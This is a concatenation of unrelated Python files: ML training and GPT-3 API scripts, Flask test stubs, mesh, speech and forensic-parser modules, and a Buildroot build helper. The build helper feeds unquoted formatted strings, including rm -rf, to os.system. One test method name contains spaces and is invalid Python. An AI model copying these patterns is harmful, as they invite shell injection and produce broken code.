n_store_mean= n_store.mean(dim=1).cpu().detach().numpy()
n_store_std = n_store.std(dim=1).cpu().detach().numpy()
render(axes, (psi_x_np[0], psi_y_np[0]), fidelities_mean, fidelities_std, last_actions_mean,n_store_mean,n_store_std)
fig.tight_layout()
plt.pause(0.5)
plt.draw()
#print(fidelity_store)
print("# of epoch :{}, Loss = {}, mean norm = {}".format(epoch, loss, (psi_x**2 + psi_y**2).sum(dim=1).mean()))
print('')
print("# of epoch :{}, Loss = {}, mean norm = {}, Final state F = {}".format(epoch, loss, (psi_x**2 + psi_y**2).sum(dim=1).mean(), fidelity_store[-1].mean()))
print('')
if __name__ == '__main__':
# parse terminal input
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--optimizer', type=str, default='ADAM',
help="Stochastic Gradient Descent (SGD), Adam (ADAM)")
parser.add_argument('-r', '--render', type=bool, default=True,
help="Should output be rendered?")
parser.add_argument('-re', '--render_every', type=int, default=25,
help="How often do you want to see the states rendered?")
parser.add_argument('-e', '--epochs', type=int, default=1000,
help="How many epochs the network is trained")
args = parser.parse_args()
dim = parameters_para.N
n_par = 64 #M=3: 256, M=4: 64, M=5: 16
# target state
target_a=np.sqrt(4)
target_state = 1/np.sqrt(2)*(qu.coherent(dim,target_a)+qu.coherent(dim,-target_a)) # eigencat
# initialize figures to render
if args.render == True: fig, axes = plt.subplots(1, 5, figsize=(18, 4))
model = PredCorrNetwork(dim, n_par, target_state)
print(model)
# print('Check Biases:')
# print(model.net_action[-1].bias)
print('--------------------------------')
print("number of model parameters:", sum([np.prod(p.size()) for p in model.parameters()]))
if args.optimizer == "SGD":
optimizer = optim.SGD(model.parameters(), lr=1e-6)
elif args.optimizer == "ADAM":
optimizer = optim.Adam(model.parameters(), lr=0.00004,eps=1e-8)
else:
print("ERROR: optimizer not implemented. Choose between SGD, ADAM")
exit()
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=200, factor=0.5, verbose=True)
noise_factor = 0.4
outputFile = '../data/para-'+str(args.epochs)+'-'+str(model.C1)+'-'+str(model.C2)+'-'+str(model.C3)+'.data'
fw = open(outputFile, 'wb')
for epoch in range(args.epochs):
train(epoch, noise_factor, optimizer, scheduler)
if epoch % args.render_every == 0:
filename = '../data/Fig-para-noise-'+str(epoch)+'.pdf'
fig.savefig(filename, dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=False, bbox_inches=None, pad_inches=0.1,
metadata=None)
eval(epoch, 0.0)
filename = '../data/Fig-para-no-noise-'+str(epoch)+'.pdf'
fig.savefig(filename, dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=False, bbox_inches=None, pad_inches=0.1,
metadata=None)
fw.close()
# store final trajectory
filename = '../data/Fig-para-final.pdf'
fig.savefig(filename, dpi=None, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=False, bbox_inches=None, pad_inches=0.1,
metadata=None)
# store final network state for serialization
torch.save({
'epoch': args.epochs,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, '../data/para_model.pth')
exit()
|
<filename>api/openai_api.py
# copied from https://github.com/minimaxir/gpt-3-experiments/blob/master/openai_api.py
import yaml
import json
import logging
import os
import asyncio
import fire
import httpx
import time
from tqdm import trange
logger = logging.getLogger("gpt3-experiments")
logger.setLevel(logging.INFO)
logging.basicConfig(
format="%(asctime)s — %(levelname)s — %(name)s — %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
def gpt3_query(headers: dict, data: str, model: str) -> str:
r = httpx.post(
f"https://api.openai.com/v1/engines/{model}/completions",
headers=headers,
data=data,
timeout=None,
)
r_json = r.json()
if "choices" not in r_json:
return ""
return r_json["choices"][0]["text"]
async def gpt3_query_async(headers: dict, data: str, model: str) -> str:
async with httpx.AsyncClient() as client:
r = await client.post(
f"https://api.openai.com/v1/engines/{model}/completions",
headers=headers,
data=data,
timeout=None,
)
r_json = r.json()
if "choices" not in r_json:
return ""
return r_json["choices"][0]["text"]
def prompt_md(prompt: str, gen_text: str) -> str:
lines = prompt.split("\n")
prompt_bold = "\n".join([f"**{line}**" if line != "" else line for line in lines])
return f"{prompt_bold}{gen_text}"
def gpt3_generate(
prompt: str = "prompt.txt",
config_file: str = "config.yml",
markdown: bool = True,
query_async: bool = False,
) -> None:
"""
Generates texts via GPT-3 and saves them to a file.
"""
with open(config_file, "r", encoding="utf-8") as f:
c = yaml.safe_load(f)
# If prompt is a file path, load the file as the prompt.
if os.path.exists(prompt):
logger.info(f"Loading prompt from {prompt}.")
with open(prompt, "r", encoding="utf-8") as f:
prompt = f.read()
else:
logger.info(f"GPT-3 Model Prompt: {prompt}.")
extension = "md" if markdown else "txt"
sample_delim = "\n---\n" if markdown else ("=" * 20)
headers = {
"Content-Type": "application/json",
"Authorization": f"Bearer {c['SECRET_KEY']}",
}
data = {
"prompt": prompt,
"max_tokens": c["max_tokens"],
}
loop = asyncio.get_event_loop()
for temp in c["temperatures"]:
data.update({"temperature": temp})
n = c["num_generate"] if temp != 0.0 else 1
n_str = "samples" if n > 1 else "sample"
output_file = f"output_{str(temp).replace('.', '_')}.{extension}"
logger.info(f"Writing {n} {n_str} at temperature {temp} to {output_file}.")
if query_async:
tasks = [
gpt3_query_async(headers, json.dumps(data), c["model"])
for _ in range(n)
]
gen_texts = loop.run_until_complete(asyncio.gather(*tasks))
else:
gen_texts = []
for _ in trange(n):
gen_texts.append(gpt3_query(headers, json.dumps(data), c["model"]))
time.sleep(5)
with open(output_file, "w", encoding="utf-8") as f:
for gen_text in gen_texts:
if gen_text:
gen_text = prompt_md(prompt, gen_text) if markdown else gen_text
f.write("{}\n{}\n".format(gen_text, sample_delim))
loop.close()
if __name__ == "__main__":
fire.Fire(gpt3_generate)
|
# coding: utf-8
from __future__ import absolute_import
from . import BaseTestCase
from six import BytesIO
from flask import json
class TestGradoDeOcupacinPorPlazasEnFinDeSemanaINEController(BaseTestCase):
""" GradoDeOcupacinPorPlazasEnFinDeSemanaINEController integration test stubs """
def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio(self):
"""
Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio
Dado una ciudad y un año obtiene el grado de ocupación por plazas en fin de semana en dicha ciudad en ese año
"""
query_string = [('Anio', 2002)]
response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnAnio/{Ciudad}'.format(Ciudad='Ciudad_example'),
method='GET',
query_string=query_string)
self.assert200(response, "Response body is : " + response.data.decode('utf-8'))
def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio_mensualmente dividido por meses(self):
"""
Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_anio_mensualmente dividido por meses
Dado una ciudad y un año obtiene el grado de ocupación por plazas en fin de semana en dicha ciudad en ese año dividido por meses
"""
query_string = [('Anio', 2002)]
response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerCantidadTotalGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnAnioMensualmente/{Ciudad}'.format(Ciudad='Ciudad_example'),
method='GET',
query_string=query_string)
self.assert200(response, "Response body is : " + response.data.decode('utf-8'))
def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios(self):
"""
Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios
Dado una ciudad y un rango de años obtiene el grado de ocupación por plazas en fin de semana en dicha ciudad en esos años
"""
query_string = [('AnioInicio', 2002),
('AnioFin', 2004)]
response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerCantidadTotalGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnRangoAnios/{Ciudad}'.format(Ciudad='Ciudad_example'),
method='GET',
query_string=query_string)
self.assert200(response, "Response body is : " + response.data.decode('utf-8'))
def test_obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios_en_mes(self):
"""
Test case for obtener_grado_de_ocupación_por_plazas_en_fin_de_semana_en_ciudad_en_rango_anios_en_mes
Dado una ciudad, un mes y un rango de años obtiene el grado de ocupación por plazas en fin de semana en dicha ciudad en esos años en ese mes
"""
query_string = [('AnioInicio', 2002),
('AnioFin', 2004),
('Mes', 'Enero')]
response = self.client.open('/server/INE/GradoDeOcupaciónPorPlazasEnFinDeSemana/ObtenerCantidadTotalGradoDeOcupaciónPorPlazasEnFinDeSemanaEnCiudadEnRangoAniosEnMes/{Ciudad}'.format(Ciudad='Ciudad_example'),
method='GET',
query_string=query_string)
self.assert200(response, "Response body is : " + response.data.decode('utf-8'))
if __name__ == '__main__':
import unittest
unittest.main()
|
from objects.CSCG._2d.mesh.domain.inputs.base import DomainInputBase
import numpy as np
from screws.decorators.classproperty.main import classproperty
class CircleHolePlate2(DomainInputBase):
""" """
def __init__(self, hx=2, hy=None, r=0.5):
"""
The DomainInput describes such a domain:
________hy_________
| |
| ___ |hx/2
| / \ |
hx| | .r | |-----> y
| \___/ |
| |
|___________________|
hy/2 |
|
|
v x
The domain is divided into following regions:
U
___________________
| |R_U| |
| R_UL |___| R_UR |
|-------/ \-------|
L | R_L | . | R_R | R
|-------\___/-------|
| R_DL |R_D| R_DR |
|_______|___|_______|
D
The center of the circle hole is at (0, 0).
Parameters
----------
"""
# ____ parse inputs ____________________________________________________________
if hy is None: hy = hx
# ____ checks __________________________________________________________________
assert hx > 0 and hy > 0, " <HolePlate> : hx={}, hy={} illegal.".format(hx, hy)
assert r < np.min((hx, hy)), " <HolePlate> : r={} too large.".format(r)
# _____________ standard inputs ________________________________________________
super().__init__(domain_name='CircleHolePlate2')
sr = np.sqrt(2) * r / 2
self.region_corner_coordinates = {
'R:R_UL': ((-hx / 2, -hy / 2), (-sr, -hy / 2), (-hx / 2, -sr), (-sr, -sr)),
'R:R_L': ((-sr, -hy / 2), (sr, -hy / 2), (-sr, -sr), (sr, -sr)),
'R:R_DL': ((sr, -hy / 2), (hx / 2, -hy / 2), (sr, -sr), (hx / 2, -sr)),
'R:R_U': ((-hx / 2, -sr), (-sr, -sr), (-hx / 2, sr), (-sr, sr)),
'R:R_D': ((sr, -sr), (hx / 2, -sr), (sr, sr), (hx / 2, sr)),
'R:R_UR': ((-hx / 2, sr), (-sr, sr), (-hx / 2, hy / 2), (-sr, hy / 2)),
'R:R_R': ((-sr, sr), (sr, sr), (-sr, hy / 2), (sr, hy / 2)),
'R:R_DR': ((sr, sr), (hx / 2, sr), (sr, hy / 2), (hx / 2, hy / 2))}
self.region_edge_types = {'R:R_L-R': ('aacw', (0, 0)),
'R:R_U-D': ('acw', (0, 0)),
'R:R_D-U': ('aacw', (0, 0)),
'R:R_R-L': ('acw', (0, 0)), }
self.boundary_region_edges = {'Upper': ("R:R_UL-U", 'R:R_U-U', "R:R_UR-U"),
'Down': ("R:R_DL-D", 'R:R_D-D', "R:R_DR-D"),
'Left': ("R:R_UL-L", 'R:R_L-L', "R:R_DL-L"),
'Right': ("R:R_UR-R", 'R:R_R-R', "R:R_DR-R"),
'Internal': ("R:R_L-R", "R:R_U-D", "R:R_D-U", 'R:R_R-L')}
self.region_interpolators = 'transfinite'
self.region_type_wr2_metric = 'transfinite'
self.internal_parameters = list()
@classproperty
def statistic(cls):
return {'periodic': False,
'region num': 8,
'mesh boundary num': 5, # the amount of mesh boundaries (instead of domain boundaries)
}
@classproperty
def random_parameters(cls):
return {} |
#!/usr/bin/env python3
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""format manifest with more metadata."""
import argparse
import functools
import json
from paddlespeech.s2t.frontend.featurizer.text_featurizer import TextFeaturizer
from paddlespeech.s2t.frontend.utility import load_cmvn
from paddlespeech.s2t.frontend.utility import read_manifest
from paddlespeech.s2t.utils.utility import add_arguments
from paddlespeech.s2t.utils.utility import print_arguments
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('feat_type', str, "raw", "speech feature type, e.g. raw(wav, flac), mat(ark), scp")
add_arg('cmvn_path', str,
'examples/librispeech/data/mean_std.json',
"Filepath of cmvn.")
add_arg('unit_type', str, "char", "Unit type, e.g. char, word, spm")
add_arg('vocab_path', str,
'examples/librispeech/data/vocab.txt',
"Filepath of the vocabulary.")
add_arg('manifest_paths', str,
None,
"Filepaths of manifests for building vocabulary. "
"You can provide multiple manifest files.",
nargs='+',
required=True)
# bpe
add_arg('spm_model_prefix', str, None,
"spm model prefix, spm_model_%(bpe_mode)_%(count_threshold), only need when `unit_type` is spm")
add_arg('output_path', str, None, "filepath of formated manifest.", required=True)
# yapf: disable
args = parser.parse_args()
def main():
print_arguments(args, globals())
fout = open(args.output_path, 'w', encoding='utf-8')
# get feat dim
filetype = args.cmvn_path.split(".")[-1]
mean, istd = load_cmvn(args.cmvn_path, filetype=filetype)
feat_dim = mean.shape[0] #(D)
print(f"Feature dim: {feat_dim}")
text_feature = TextFeaturizer(args.unit_type, args.vocab_path, args.spm_model_prefix)
vocab_size = text_feature.vocab_size
print(f"Vocab size: {vocab_size}")
count = 0
for manifest_path in args.manifest_paths:
manifest_jsons = read_manifest(manifest_path)
for line_json in manifest_jsons:
line = line_json['text']
tokens = text_feature.tokenize(line)
tokenids = text_feature.featurize(line)
line_json['token'] = tokens
line_json['token_id'] = tokenids
line_json['token_shape'] = (len(tokenids), vocab_size)
feat_shape = line_json['feat_shape']
assert isinstance(feat_shape, (list, tuple)), type(feat_shape)
if args.feat_type == 'raw':
feat_shape.append(feat_dim)
line_json['filetype'] = 'sound'
else: # kaldi
raise NotImplementedError('no support kaldi feat now!')
fout.write(json.dumps(line_json) + '\n')
count += 1
print(f"Examples number: {count}")
fout.close()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""This file contains the Task Scheduler Registry keys plugins."""
import construct
from plaso.events import windows_events
from plaso.events import time_events
from plaso.parsers import winreg
from plaso.parsers.winreg_plugins import interface
class TaskCacheEvent(time_events.FiletimeEvent):
"""Convenience class for a Task Cache event."""
DATA_TYPE = u'task_scheduler:task_cache:entry'
def __init__(
self, timestamp, timestamp_description, task_name, task_identifier):
"""Initializes the event.
Args:
timestamp: The FILETIME value for the timestamp.
timestamp_description: The usage string for the timestamp value.
task_name: String containing the name of the task.
task_identifier: String containing the identifier of the task.
"""
super(TaskCacheEvent, self).__init__(timestamp, timestamp_description)
self.offset = 0
self.task_name = task_name
self.task_identifier = task_identifier
class TaskCachePlugin(interface.KeyPlugin):
"""Plugin that parses a Task Cache key."""
NAME = u'windows_task_cache'
DESCRIPTION = u'Parser for Task Scheduler cache Registry data.'
REG_TYPE = u'SOFTWARE'
REG_KEYS = [
u'\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache']
URL = [
u'https://code.google.com/p/winreg-kb/wiki/TaskSchedulerKeys']
_DYNAMIC_INFO_STRUCT = construct.Struct(
u'dynamic_info_record',
construct.ULInt32(u'version'),
construct.ULInt64(u'last_registered_time'),
construct.ULInt64(u'launch_time'),
construct.Padding(8))
_DYNAMIC_INFO_STRUCT_SIZE = _DYNAMIC_INFO_STRUCT.sizeof()
def _GetIdValue(self, key):
"""Retrieves the Id value from Task Cache Tree key.
Args:
key: A Windows Registry key (instance of WinRegKey).
Yields:
A tuple containing a Windows Registry Key (instance of WinRegKey) and
a Windows Registry value (instance of WinRegValue).
"""
id_value = key.GetValue(u'Id')
if id_value:
yield key, id_value
for sub_key in key.GetSubkeys():
for value_key, id_value in self._GetIdValue(sub_key):
yield value_key, id_value
def GetEntries(
self, parser_mediator, key=None, registry_file_type=None,
codepage=u'cp1252', **unused_kwargs):
"""Parses a Task Cache Registry key.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
key: Optional Registry key (instance of winreg.WinRegKey).
The default is None.
registry_file_type: Optional string containing the Windows Registry file
type, e.g. NTUSER, SOFTWARE. The default is None.
codepage: Optional extended ASCII string codepage. The default is cp1252.
"""
tasks_key = key.GetSubkey(u'Tasks')
tree_key = key.GetSubkey(u'Tree')
if not tasks_key or not tree_key:
parser_mediator.ProduceParseError(
u'Task Cache is missing a Tasks or Tree sub key.')
return
task_guids = {}
for sub_key in tree_key.GetSubkeys():
for value_key, id_value in self._GetIdValue(sub_key):
# The GUID is in the form {%GUID%} and stored an UTF-16 little-endian
# string and should be 78 bytes in size.
if len(id_value.raw_data) != 78:
parser_mediator.ProduceParseError(u'Unsupported Id value data size.')
continue
task_guids[id_value.data] = value_key.name
for sub_key in tasks_key.GetSubkeys():
dynamic_info_value = sub_key.GetValue(u'DynamicInfo')
if not dynamic_info_value:
continue
if len(dynamic_info_value.raw_data) != self._DYNAMIC_INFO_STRUCT_SIZE:
parser_mediator.ProduceParseError(
u'Unsupported DynamicInfo value data size.')
continue
dynamic_info = self._DYNAMIC_INFO_STRUCT.parse(
dynamic_info_value.raw_data)
name = task_guids.get(sub_key.name, sub_key.name)
text_dict = {}
text_dict[u'Task: {0:s}'.format(name)] = u'[ID: {0:s}]'.format(
sub_key.name)
event_object = windows_events.WindowsRegistryEvent(
key.last_written_timestamp, key.path, text_dict, offset=key.offset,
registry_file_type=registry_file_type)
parser_mediator.ProduceEvent(event_object)
if dynamic_info.last_registered_time:
# Note this is likely either the last registered time or
# the update time.
event_object = TaskCacheEvent(
dynamic_info.last_registered_time, u'Last registered time', name,
sub_key.name)
parser_mediator.ProduceEvent(event_object)
if dynamic_info.launch_time:
# Note this is likely the launch time.
event_object = TaskCacheEvent(
dynamic_info.launch_time, u'Launch time', name, sub_key.name)
parser_mediator.ProduceEvent(event_object)
# TODO: Add support for the Triggers value.
winreg.WinRegistryParser.RegisterPlugin(TaskCachePlugin)
|
#! /usr/bin/env python3
import os
import sys
import json
import datetime
import subprocess
from cprint import *
from threading import Thread, Lock, Event
from multiprocessing.pool import ThreadPool
def llist (dest):
os.system("ls -l {}".format(dest))
def rmf (dest):
os.system("rm -f {}".format(dest))
def rmrf (dest):
os.system("rm -rf {}".format(dest))
def mkdir (dest):
os.system("mkdir -p {}".format(dest))
def touch (dest):
os.system("touch {}".format(dest))
def symlink (source, dest):
os.system("ln -sf {} {}".format(source, dest))
def zip (dest, source):
os.system("zip -r {} {}".format(dest, source))
def cat_dump (source, dest):
os.system("cat {} >> {}".format(source, dest))
def file_append (source, content):
with open(source, "a") as fd:
fd.write(content+"\n")
def echo (content, dest):
os.system('echo "{}" >> {}'.format(content, dest))
def git_clone (repo, branch=None, dest=None):
cmd = "git clone {}".format(repo)
if branch is not None:
cmd += " --branch {}".format(branch)
if dest is not None:
cmd += " {}".format(dest)
os.system(cmd)
def git_checkout (dest):
os.system("git checkout {}".format(dest))
def exists (dest):
return os.path.exists(dest)
def make (dest=None, target=None):
cmd = "make"
if dest is not None:
cmd += " -C {}".format(dest)
if target is not None:
cmd += " {}".format(target)
cmd = cmd.split(" ")
subprocess.run(args=cmd)
#os.system(cmd)
def grep (dest, marker):
with open(dest,"r") as fd:
content = fd.read()
for line in content.split("\n"):
if marker in line:
return line
DEFAULT_PRE_CONFIGURE_HOOKS = [{
"script": "test=$(gcc --version | head -n 1 | cut -d\" \" -f3) \
&& __BR2_EXTERNAL__/scripts/test_gcc.py 8.1.0 $test",
"output": "/tmp/.gcc_ok",
},]
class Hook :
def __init__ (self, name, descriptor):
self.output = None
self.cmds = []
self.name = name
if "output" in descriptor:
self.output = descriptor["output"]
for t in descriptor["script"].split(";"):
t = t.strip(";")
t = t.strip()
# special macros
t = t.replace("__BR2_EXTERNAL__", os.environ["BR2_EXTERNAL"])
t = t.replace("__TIMESTAMP__", datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
self.cmds.append(t)
def has_output (self):
return self.output is not None
def run (self):
do_run = not os.path.exists(self.output) if self.has_output() else False
if do_run :
for c in self.cmds:
retcode = os.system(c)
if retcode > 0:
raise RuntimeError("hook {} failed".format(self.name))
if self.has_output():
touch(self.output)
def clean (self):
if self.has_output():
rmf(self.output)
class Board :
__BUILD_STAMP__ = datetime.datetime.now()
def __init__ (self, name, pre_config_hooks=None, post_build_hooks=None, layers=[]):
self.name = name
self.layers = layers
def board_dir (self):
return "{}/boards/{}".format(os.environ["BR2_EXTERNAL"], self.name)
def defconfig (self):
return self.board_dir() + "/config"
def arch (self):
return grep(self.defconfig(), " # cpu").split("=")[0].strip("BR2_")
def custom_dts (self):
files = os.listdir(self.board_dir())
for f in files:
if f.split(".")[-1] == "dts":
if not "-layer" in f:
if not "-overlay" in f:
return f
def has_custom_dts (self):
return self.custom_dts() is not None
def devicetree (self):
return "{}/{}".format(self.board_dir(), self.custom_dts())
def mkconfig (self, br_config):
echo("# {} layer".format(self.name), br_config)
cat_dump(self.defconfig(), br_config)
for layer in self.layers:
cat_dump(self.board_dir() +"/" +layer + "-layer.dts", self.board_dir() + "/" + self.custom_dts())
# shared but standard attributes
if self.has_custom_dts():
file_append(br_config, "BR2_LINUX_KERNEL_CUSTOM_DTS_PATH=\"{}\"".format(self.board_dir() + "/" + self.custom_dts()))
if exists("{}/uboot-fragments".format(self.board_dir())):
file_append(br_config, "BR2_TARGET_UBOOT_CONFIG_FRAGMENT_FILES=\"{}\"".format(self.board_dir() + "/uboot-fragments"))
class Image :
def __init__ (self, name, pre_config_hooks=[], boards=[]):
self.name = name
self.pre_config_hooks = pre_config_hooks
self.boards = []
for b in boards:
self.boards.append(b)
def recipe_dir (self):
return "{}/recipes/{}".format(os.environ["BR2_EXTERNAL"], self.name)
def defconfig (self, work_dir):
return "{}/{}_defconfig".format(self.recipe_dir(), self.name)
def clean (self, work_dir):
""" cleans given image """
for hk in self.pre_configure_hooks:
hk.clean()
def cook (self, work_dir):
""" builds given image """
for hk in self.pre_config_hooks:
hk.run()
for b in self.boards :
br_dir = work_dir + "/buildroot"
br_config = br_dir + "/configs/{}_defconfig".format(self.name)
cprint.info("applying {} board layer".format(b.name))
rmf(br_config)
b.mkconfig(br_config)
cprint.info("cooking {} recipe".format(self.name))
if exists("{}/overlay".format(self.recipe_dir())):
file_append(br_config, 'BR2_ROOTFS_OVERLAY=\"{}\"'.format(self.recipe_dir() +"/overlay"))
if exists("{}/patches".format(self.recipe_dir())):
file_append(br_config, 'BR2_GLOBAL_PATCH_DIR=\"{}\"'.format(self.recipe_dir() +"/patches"))
if exists("{}/linux-fragments".format(self.recipe_dir())):
file_append(br_config, "BR2_LINUX_KERNEL_CONFIG_FRAGMENT_FILES=\"{}\"".format(self.recipe_dir() + "/linux-fragments"))
if exists("{}/busybox-fragments".format(self.recipe_dir())):
file_append(br_config, 'BR2_PACKAGE_BUSYBOX_CONFIG_FRAGMENT_FILES=\"{}\"'.format(self.recipe_dir() +"/busybox-fragments"))
cat_dump(self.defconfig(work_dir), br_config)
arch = b.arch()
make(dest=br_dir, target="{}_defconfig".format(self.name))
make(dest=br_dir)
cprint.info("image ready!")
cprint.info(str(os.listdir(work_dir + "/image")))
class Cooker :
def __init__(self, recipes=[]):
self.recipes = recipes
def __len__ (self):
return len(self.recipes)
def pop (self):
self.recipes.pop()
def push (self, r):
self.recipes.append(r)
def cook (self, work_dir, br2_url, br2_tag):
for r in self.recipes:
br_dir = work_dir + "/buildroot-{}".format(r.name)
if not exists(br_dir):
cprint.warn("Downloading a buildroot")
git_clone(br2_url, branch=br2_tag, dest=br_dir)
# remove residues
rmf(work_dir + "/image")
rmf(work_dir + "/buildroot")
symlink(br_dir, work_dir + "/buildroot")
symlink(br_dir + "/output/images", work_dir + "/image")
r.cook(work_dir)
rmf("image-{}.zip")
zip("image-{}.zip".format(r.name), work_dir + "/image")
def clean (self, work_dir):
# remove residues
rmf(work_dir + "/image")
rmf(work_dir + "/buildroot")
for r in self.recipes:
r.clean()
rmf("image-{}.zip".format(r.name))
def cooker (argv):
cooker = Cooker()
clean = False
recipes = []
dl_dir = "~/br2-downloads"
_br2_external_ = os.environ["BR2_EXTERNAL"]
work_dir = _br2_external_
br2_url = "https://github.com/buildroot/buildroot"
br2_tag = "2021.08.2"
for i in range (0, len(argv)):
if argv[i] == "--list":
recipes = []
files = os.listdir(_br2_external_ + "/recipes")
for f in files:
if exists(_br2_external_ + "/recipes/{}/recipe".format(f)):
recipes.append(f)
print(recipes)
return 0
if argv[i] == "--list-boards":
boards = []
files = os.listdir(_br2_external_ + "/boards")
for f in files:
if exists(_br2_external_ + "/boards/{}/config".format(f)):
boards.append(f)
print(boards)
return 0
if argv[i] == "--br2-revision":
print("Buildroot revision : {}".format(br2_tag))
return 0
if argv[i] == "--br2-url":
br2_url = argv[i+1]
if argv[i] == "--br2-tag":
br2_tag = argv[i+1]
if argv[i] == "--dl-dir":
dl_dir = argv[i+1]
if argv[i] == "--work-dir":
work_dir = argv[i+1]
if argv[i] == "--recipe":
path = argv[i+1]
if not "/" in path:
recipe_name = path
path = _br2_external_ + "/recipes/{}/recipe".format(recipe_name)
else:
recipe_name = path.split("/")[-1]
recipe = open(path, "r")
recipe = json.loads(recipe.read())
boards = []
pre_config_hooks = []
if "pre_configure_hooks" in recipe:
hooks = recipe["pre_configure_hooks"][0]
for k in hooks.keys():
pre_config_hooks.append(Hook(k, hooks[k]))
bds = recipe["boards"][0]
for board in bds.keys():
bd = Board(bds[board]["board"], layers=[])
boards.append(bd)
recipe = Image(recipe_name, pre_config_hooks=pre_config_hooks, boards=boards)
cooker.push(recipe)
if argv[i] == "--clean":
clean = True
if clean:
cooker.clean(work_dir)
else:
# make sure requirements have run
for hook in DEFAULT_PRE_CONFIGURE_HOOKS:
hk = Hook(hook["output"], hook)
hk.run()
# cook requested recipes
cooker.cook(work_dir, br2_url, br2_tag)
if __name__ == "__main__":
cooker(sys.argv[1:])
|
"""Command line entry point to the application using the application CLI.
"""
__author__ = 'plandes'
from typing import Dict, Any, List, Type, Union
from dataclasses import dataclass, field
from enum import Enum, auto
import logging
import gc
import sys
import itertools as it
import copy as cp
from io import TextIOBase
from pathlib import Path
from zensols.persist import dealloc, Deallocatable, PersistedWork, persisted
from zensols.config import (
Writable, Configurable, ImportConfigFactory, DictionaryConfig
)
from zensols.cli import (
ApplicationError, Application, ApplicationFactory,
ActionCliManager, Invokable, CliHarness,
)
from zensols.dataset import (
SplitStashContainer, StratifiedStashSplitKeyContainer
)
from zensols.deeplearn import DeepLearnError, TorchConfig
from zensols.deeplearn.model import ModelFacade, ModelError
from zensols.deeplearn.result import (
ModelResultManager, ModelResultReporter, PredictionsDataFrameFactory,
ModelResultComparer
)
logger = logging.getLogger(__name__)
class InfoItem(Enum):
"""Indicates what information to dump in
:meth:`.FacadeInfoApplication.print_information`.
"""
meta = auto()
param = auto()
model = auto()
config = auto()
batch = auto()
class ClearType(Enum):
"""Indicates what type of data to delete (clear).
"""
none = auto()
batch = auto()
source = auto()
@dataclass
class FacadeApplication(Deallocatable):
"""Base class for applications that use :class:`.ModelFacade`.
"""
CLI_META = {'mnemonic_excludes': {'get_cached_facade', 'create_facade',
'deallocate', 'clear_cached_facade'},
'option_overrides': {'model_path': {'long_name': 'model',
'short_name': None}}}
"""Tell the command line app API to igonore subclass and client specific use
case methods.
"""
config: Configurable = field()
"""The config used to create facade instances."""
facade_name: str = field(default='facade')
"""The client facade."""
# simply copy this field and documentation to the implementation class to
# add model path location (for those subclasses that don't have the
# ``CLASS_INSPECTOR`` class level attribute set (see
# :obj:`~zensols.util.introspect.inspect.ClassInspector.INSPECT_META`);
# this can also be set as a parameter such as with
# :methd:`.FacadeModelApplication.test`
model_path: Path = field(default=None)
"""The path to the model or use the last trained model if not provided.
"""
config_factory_args: Dict[str, Any] = field(default_factory=dict)
"""The arguments given to the :class:`~zensols.config.ImportConfigFactory`,
which could be useful for reloading all classes while debugingg.
"""
config_overwrites: Configurable = field(default=None)
"""A configurable that clobbers any configuration in :obj:`config` for those
sections/options set.
"""
def __post_init__(self):
self.dealloc_resources = []
self._cached_facade = PersistedWork('_cached_facade', self, True)
def _enable_cli_logging(self, facade: ModelFacade):
facade.progress_bar = False
facade.configure_cli_logging()
def create_facade(self) -> ModelFacade:
"""Create a new instance of the facade."""
# we must create a new (non-shared) instance of the facade since it
# will get deallcated after complete.
config = self.config
model_path = self.model_path
if self.config_overwrites is not None:
config = cp.deepcopy(config)
config.merge(self.config_overwrites)
if model_path is None:
cf = ImportConfigFactory(config, **self.config_factory_args)
facade: ModelFacade = cf.instance(self.facade_name)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'created facade: {facade}')
self.dealloc_resources.extend((cf, facade))
else:
if logger.isEnabledFor(logging.INFO):
logger.info(f'loading model from {model_path}')
with dealloc(ImportConfigFactory(
config, **self.config_factory_args)) as cf:
cls: Type[ModelFacade] = cf.get_class(self.facade_name)
facade: ModelFacade = cls.load_from_path(model_path)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'created facade: {type(facade)} ' +
f'from path: {model_path}')
self.dealloc_resources.append(facade)
return facade
@persisted('_cached_facade')
def get_cached_facade(self, path: Path = None) -> ModelFacade:
"""Return a created facade that is cached in this application instance.
"""
return self.create_facade()
def clear_cached_facade(self):
